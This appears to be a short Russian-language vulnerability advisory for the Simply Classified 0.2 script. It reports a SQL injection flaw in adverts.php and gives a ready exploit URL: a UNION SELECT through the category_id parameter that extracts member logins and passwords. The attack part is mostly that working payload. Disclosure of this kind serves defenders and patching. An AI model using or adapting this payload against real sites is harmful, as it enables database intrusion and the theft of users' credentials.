Программа: Simply Classified 0.2

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием adverts.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

http://127.0.0.1/classified/adverts.php?category_id=5 UNION ALL SELECT
1,2,concat(login,0x3a,passwd),4,5,6,7,8,9,10 FROM members



Оставить мнение